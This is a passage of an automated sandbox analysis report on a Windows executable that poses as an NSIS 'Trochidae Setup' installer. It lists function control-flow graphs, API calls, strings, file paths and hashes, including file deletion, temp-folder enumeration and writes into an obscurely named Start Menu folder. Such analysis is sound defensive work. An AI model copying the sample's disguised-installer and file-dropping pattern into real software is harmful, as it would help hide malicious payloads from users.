                                                                                        control_flow_graph 493 4057a2-4057c8 call 405a60 496 4057e1-4057e8 493->496 497 4057ca-4057dc DeleteFileA 493->497 499 4057ea-4057ec 496->499 500 4057fb-40580b call 405fda 496->500 498 40596b-40596f 497->498 501 4057f2-4057f5 499->501 502 405919-40591e 499->502 506 40581a-40581b call 4059b9 500->506 507 40580d-405818 lstrcatA 500->507 501->500 501->502 502->498 504 405920-405923 502->504 508 405925-40592b 504->508 509 40592d-405935 call 4062dd 504->509 510 405820-405823 506->510 507->510 508->498 509->498 517 405937-40594b call 405972 call 40575a 509->517 513 405825-40582c 510->513 514 40582e-405834 lstrcatA 510->514 513->514 516 405839-405857 lstrlenA FindFirstFileA 513->516 514->516 518 40585d-405874 call 40599d 516->518 519 40590f-405913 516->519 529 405963-405966 call 405101 517->529 530 40594d-405950 517->530 527 405876-40587a 518->527 528 40587f-405882 518->528 519->502 521 405915 519->521 521->502 527->528 531 40587c 527->531 532 405884-405889 528->532 533 405895-4058a3 call 405fda 528->533 529->498 530->508 535 405952-405961 call 405101 call 405db9 530->535 531->528 537 40588b-40588d 532->537 538 4058ee-405900 FindNextFileA 532->538 543 4058a5-4058ad 533->543 544 4058ba-4058c5 call 40575a 533->544 535->498 537->533 542 40588f-405893 537->542 538->518 541 405906-405909 FindClose 538->541 541->519 542->533 542->538 543->538 546 4058af-4058b8 call 4057a2 543->546 553 4058e6-4058e9 call 405101 544->553 554 4058c7-4058ca 544->554 546->538 553->538 556 4058cc-4058dc call 405101 call 405db9 554->556 557 4058de-4058e4 554->557 556->538 557->538
                                                                                        APIs
                                                                                        • DeleteFileA.KERNELBASE(?,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057CB
                                                                                        • lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405813
                                                                                        • lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405834
                                                                                        • lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040583A
                                                                                        • FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040584B
                                                                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058F8
                                                                                        • FindClose.KERNEL32(00000000), ref: 00405909
                                                                                        Strings
                                                                                        • \*.*, xrefs: 0040580D
                                                                                        • "C:\Users\user\Desktop\jU0hAXFL0k.exe", xrefs: 004057A2
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004057AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                        • String ID: "C:\Users\user\Desktop\jU0hAXFL0k.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                        • API String ID: 2035342205-1946058045
                                                                                        • Opcode ID: 9534ed492e479d78e2508825cc8aff22a23d0aad2da830bd7208bf437f0dd8c3
                                                                                        • Instruction ID: d5f8e1a5a2f38c4268bcbec4acbb3c578bb2518a62eabdffbc14051f19ad4651
                                                                                        • Opcode Fuzzy Hash: 9534ed492e479d78e2508825cc8aff22a23d0aad2da830bd7208bf437f0dd8c3
                                                                                        • Instruction Fuzzy Hash: F251E171900A18BADB21BB228C45BAF7A79DF42724F14807BF841B51D2D77C8942DEAD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 562 401759-40177c call 402b2c call 4059df 567 401786-401798 call 405fda call 405972 lstrcatA 562->567 568 40177e-401784 call 405fda 562->568 573 40179d-4017a3 call 406244 567->573 568->573 578 4017a8-4017ac 573->578 579 4017ae-4017b8 call 4062dd 578->579 580 4017df-4017e2 578->580 587 4017ca-4017dc 579->587 588 4017ba-4017c8 CompareFileTime 579->588 582 4017e4-4017e5 call 405b4e 580->582 583 4017ea-401806 call 405b73 580->583 582->583 590 401808-40180b 583->590 591 40187e-4018a7 call 405101 call 402ffb 583->591 587->580 588->587 593 401860-40186a call 405101 590->593 594 40180d-40184f call 405fda * 2 call 405ffc call 405fda call 4056f6 590->594 604 4018a9-4018ad 591->604 605 4018af-4018bb SetFileTime 591->605 606 401873-401879 593->606 594->578 625 401855-401856 594->625 604->605 608 4018c1-4018cc CloseHandle 604->608 605->608 609 4029c1 606->609 612 4018d2-4018d5 608->612 613 4029b8-4029bb 608->613 611 4029c3-4029c7 609->611 615 4018d7-4018e8 call 405ffc lstrcatA 612->615 616 4018ea-4018ed call 405ffc 612->616 613->609 622 4018f2-402349 615->622 616->622 626 40234e-402353 622->626 627 402349 call 4056f6 622->627 625->606 628 401858-401859 625->628 626->611 627->626 628->593
                                                                                        APIs
                                                                                        • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers,00000000,00000000,00000031), ref: 00401798
                                                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers,00000000,00000000,00000031), ref: 004017C2
                                                                                          • Part of subcall function 00405FDA: lstrcpynA.KERNEL32(?,?,00000400,00403307,00422F00,NSIS Error,?,00000006,?,0000000A), ref: 00405FE7
                                                                                          • Part of subcall function 00405101: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
                                                                                          • Part of subcall function 00405101: lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
                                                                                          • Part of subcall function 00405101: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
                                                                                          • Part of subcall function 00405101: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll), ref: 0040516F
                                                                                          • Part of subcall function 00405101: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405195
                                                                                          • Part of subcall function 00405101: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051AF
                                                                                          • Part of subcall function 00405101: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051BD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp$C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers$Call
                                                                                        • API String ID: 1941528284-439225009
                                                                                        • Opcode ID: c6da4502b6adcf321318d0f1773259c573a0bb333ddf9e97089b2f5c1e78f574
                                                                                        • Instruction ID: a8f8d2e71aafd7953ecb4fd9af401e61999b8e286ce35665580707d8cc6a98aa
                                                                                        • Opcode Fuzzy Hash: c6da4502b6adcf321318d0f1773259c573a0bb333ddf9e97089b2f5c1e78f574
                                                                                        • Instruction Fuzzy Hash: BC41D371A0451ABACB107FA5DC45D9F3AB9EF05329B20823BF411F10E1C63C8A419B6E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406666 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b42b921e85d89c0e117f5f9f4e0d0c16e752254418a7148ec341c06b29f841c9
                                                                                        • Instruction ID: 4f714145f5a313d6319dbd2ae6a602097e3dd159542c3e152d0bb7460fb66c8d
                                                                                        • Opcode Fuzzy Hash: b42b921e85d89c0e117f5f9f4e0d0c16e752254418a7148ec341c06b29f841c9
                                                                                        • Instruction Fuzzy Hash: 25F17571D00229CBDF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7395A96CF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004062DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileA.KERNELBASE(76403410,00421558,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00405AA3,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,76403410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,76403410,C:\Users\user\AppData\Local\Temp\), ref: 004062E8
                                                                                        • FindClose.KERNEL32(00000000), ref: 004062F4
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\nsz7A32.tmp, xrefs: 004062DD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp
                                                                                        • API String ID: 2295610775-3296606243
                                                                                        • Opcode ID: 78efce08eb58f860d58d9cc4337d862744689776f4b13788d4bc070c197dd51e
                                                                                        • Instruction ID: 9f0851c2fc9ceccd35e24d87c19841e9ead441a619ffea6187f1505ec1ede2b7
                                                                                        • Opcode Fuzzy Hash: 78efce08eb58f860d58d9cc4337d862744689776f4b13788d4bc070c197dd51e
                                                                                        • Instruction Fuzzy Hash: B1D012319090207BC30117386E0C85B7A599B553317228A77F967F12F0C7388C7696E9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00403B94 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 185 403b94-403ba6 186 403ce7-403cf6 185->186 187 403bac-403bb2 185->187 189 403d45-403d5a 186->189 190 403cf8-403d40 GetDlgItem * 2 call 404068 SetClassLongA call 40140b 186->190 187->186 188 403bb8-403bc1 187->188 191 403bc3-403bd0 SetWindowPos 188->191 192 403bd6-403bd9 188->192 194 403d9a-403d9f call 4040b4 189->194 195 403d5c-403d5f 189->195 190->189 191->192 197 403bf3-403bf9 192->197 198 403bdb-403bed ShowWindow 192->198 203 403da4-403dbf 194->203 200 403d61-403d6c call 401389 195->200 201 403d92-403d94 195->201 204 403c15-403c18 197->204 205 403bfb-403c10 DestroyWindow 197->205 198->197 200->201 216 403d6e-403d8d SendMessageA 200->216 201->194 202 404035 201->202 211 404037-40403e 202->211 209 403dc1-403dc3 call 40140b 203->209 210 403dc8-403dce 203->210 214 403c1a-403c26 SetWindowLongA 204->214 215 403c2b-403c31 204->215 212 404012-404018 205->212 209->210 219 403ff3-40400c DestroyWindow EndDialog 210->219 220 403dd4-403ddf 210->220 212->202 218 40401a-404020 212->218 214->211 221 403cd4-403ce2 call 4040cf 215->221 222 403c37-403c48 GetDlgItem 215->222 216->211 218->202 224 404022-40402b ShowWindow 218->224 219->212 220->219 225 403de5-403e32 call 405ffc call 404068 * 3 GetDlgItem 220->225 221->211 226 403c67-403c6a 222->226 227 403c4a-403c61 SendMessageA IsWindowEnabled 222->227 224->202 255 403e34-403e39 225->255 256 403e3c-403e78 ShowWindow KiUserCallbackDispatcher call 40408a EnableWindow 225->256 228 403c6c-403c6d 226->228 229 403c6f-403c72 226->229 227->202 227->226 232 403c9d-403ca2 call 404041 228->232 233 403c80-403c85 229->233 234 403c74-403c7a 229->234 232->221 236 403cbb-403cce SendMessageA 233->236 238 403c87-403c8d 233->238 234->236 237 403c7c-403c7e 234->237 236->221 237->232 241 403ca4-403cad call 40140b 238->241 242 403c8f-403c95 call 40140b 238->242 241->221 251 403caf-403cb9 241->251 253 403c9b 242->253 251->253 253->232 255->256 259 403e7a-403e7b 256->259 260 403e7d 256->260 261 403e7f-403ead GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403ec2 261->262 263 403eaf-403ec0 SendMessageA 261->263 264 403ec8-403f02 call 40409d call 403b75 call 405fda lstrlenA call 405ffc SetWindowTextA call 401389 262->264 263->264 264->203 275 403f08-403f0a 264->275 275->203 276 403f10-403f14 275->276 277 403f33-403f47 DestroyWindow 276->277 278 403f16-403f1c 276->278 277->212 280 403f4d-403f7a CreateDialogParamA 277->280 278->202 279 403f22-403f28 278->279 279->203 281 403f2e 279->281 280->212 282 403f80-403fd7 call 404068 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 280->282 281->202 282->202 287 403fd9-403fec ShowWindow call 4040b4 282->287 289 403ff1 287->289 289->212
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BD0
                                                                                        • ShowWindow.USER32(?), ref: 00403BED
                                                                                        • DestroyWindow.USER32 ref: 00403C01
                                                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C1D
                                                                                        • GetDlgItem.USER32(?,?), ref: 00403C3E
                                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C52
                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403C59
                                                                                        • GetDlgItem.USER32(?,?), ref: 00403D07
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403D11
                                                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403D2B
                                                                                        • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403D7C
                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00403E22
                                                                                        • ShowWindow.USER32(00000000,?), ref: 00403E43
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E55
                                                                                        • EnableWindow.USER32(?,?), ref: 00403E70
                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403E86
                                                                                        • EnableMenuItem.USER32(00000000), ref: 00403E8D
                                                                                        • SendMessageA.USER32(?,?,00000000,?), ref: 00403EA5
                                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403EB8
                                                                                        • lstrlenA.KERNEL32(Trochidae Setup: Installing,?,Trochidae Setup: Installing,00000000), ref: 00403EE2
                                                                                        • SetWindowTextA.USER32(?,Trochidae Setup: Installing), ref: 00403EF1
                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00404025
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                        • String ID: Trochidae Setup: Installing
                                                                                        • API String ID: 3282139019-4121273588
                                                                                        • Opcode ID: e57483be0e8f0953cc8724a3e8c8ea21599a840bb85b0af5ee6d9011d8646a3c
                                                                                        • Instruction ID: ba3e3afbb1df49eb3663f2526bbc67ab17a8ece20d2805bf2467eb782e73bce3
                                                                                        • Opcode Fuzzy Hash: e57483be0e8f0953cc8724a3e8c8ea21599a840bb85b0af5ee6d9011d8646a3c
                                                                                        • Instruction Fuzzy Hash: FEC1AEB2604205BBDB206F61ED49D2B7A6CFB85706F40443EF641B11F1C779A942EB2E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004037F7 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 290 4037f7-40380f call 406372 293 403811-403821 call 405f38 290->293 294 403823-403854 call 405ec1 290->294 303 403877-4038a0 call 403abc call 405a60 293->303 299 403856-403867 call 405ec1 294->299 300 40386c-403872 lstrcatA 294->300 299->300 300->303 308 4038a6-4038ab 303->308 309 403927-40392f call 405a60 303->309 308->309 310 4038ad-4038d1 call 405ec1 308->310 315 403931-403938 call 405ffc 309->315 316 40393d-403962 LoadImageA 309->316 310->309 317 4038d3-4038d5 310->317 315->316 319 4039e3-4039eb call 40140b 316->319 320 403964-403994 RegisterClassA 316->320 321 4038e6-4038f2 lstrlenA 317->321 322 4038d7-4038e4 call 40599d 317->322 334 4039f5-403a00 call 403abc 319->334 335 4039ed-4039f0 319->335 323 403ab2 320->323 324 40399a-4039de SystemParametersInfoA CreateWindowExA 320->324 328 4038f4-403902 lstrcmpiA 321->328 329 40391a-403922 call 405972 call 405fda 321->329 322->321 327 403ab4-403abb 323->327 324->319 328->329 333 403904-40390e GetFileAttributesA 328->333 329->309 338 403910-403912 333->338 339 403914-403915 call 4059b9 333->339 343 403a06-403a20 ShowWindow call 406304 334->343 344 403a89-403a8a call 4051d3 334->344 335->327 338->329 338->339 339->329 351 403a22-403a27 call 406304 343->351 352 403a2c-403a3e GetClassInfoA 343->352 347 403a8f-403a91 344->347 349 403a93-403a99 347->349 350 403aab-403aad call 40140b 347->350 349->335 353 403a9f-403aa6 call 40140b 349->353 350->323 351->352 356 403a40-403a50 GetClassInfoA RegisterClassA 352->356 357 403a56-403a79 DialogBoxParamA call 40140b 352->357 353->335 356->357 361 403a7e-403a87 call 403747 357->361 361->327
                                                                                        APIs
                                                                                          • Part of subcall function 00406372: GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
                                                                                          • Part of subcall function 00406372: GetProcAddress.KERNEL32(00000000,?), ref: 0040639F
                                                                                        • lstrcatA.KERNEL32(1033,Trochidae Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Trochidae Setup: Installing,00000000,00000002,76403410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\jU0hAXFL0k.exe",00000000), ref: 00403872
                                                                                        • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens,1033,Trochidae Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Trochidae Setup: Installing,00000000,00000002,76403410), ref: 004038E7
                                                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 004038FA
                                                                                        • GetFileAttributesA.KERNEL32(Call), ref: 00403905
                                                                                        • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens), ref: 0040394E
                                                                                          • Part of subcall function 00405F38: wsprintfA.USER32 ref: 00405F45
                                                                                        • RegisterClassA.USER32(00422EA0), ref: 0040398B
                                                                                        • SystemParametersInfoA.USER32(?,00000000,?,00000000), ref: 004039A3
                                                                                        • CreateWindowExA.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039D8
                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403A0E
                                                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 00403A3A
                                                                                        • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 00403A47
                                                                                        • RegisterClassA.USER32(00422EA0), ref: 00403A50
                                                                                        • DialogBoxParamA.USER32(?,00000000,00403B94,00000000), ref: 00403A6F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                        • String ID: "C:\Users\user\Desktop\jU0hAXFL0k.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Trochidae Setup: Installing$_Nb
                                                                                        • API String ID: 1975747703-80757779
                                                                                        • Opcode ID: a2a89361b445a099ea431d97f26b4be8e8633abf330fc856fce069af7e92bfea
                                                                                        • Instruction ID: cc9ff768997195dfc6b08b7ed0d0e3ca7810037f4103f2fdd35eeb1d807c43ce
                                                                                        • Opcode Fuzzy Hash: a2a89361b445a099ea431d97f26b4be8e8633abf330fc856fce069af7e92bfea
                                                                                        • Instruction Fuzzy Hash: 1961C4B07442007EE620AF659D45F2B3AACEB4475AB40447EF941B22E2D7BC9D02DA2D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402DC4 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
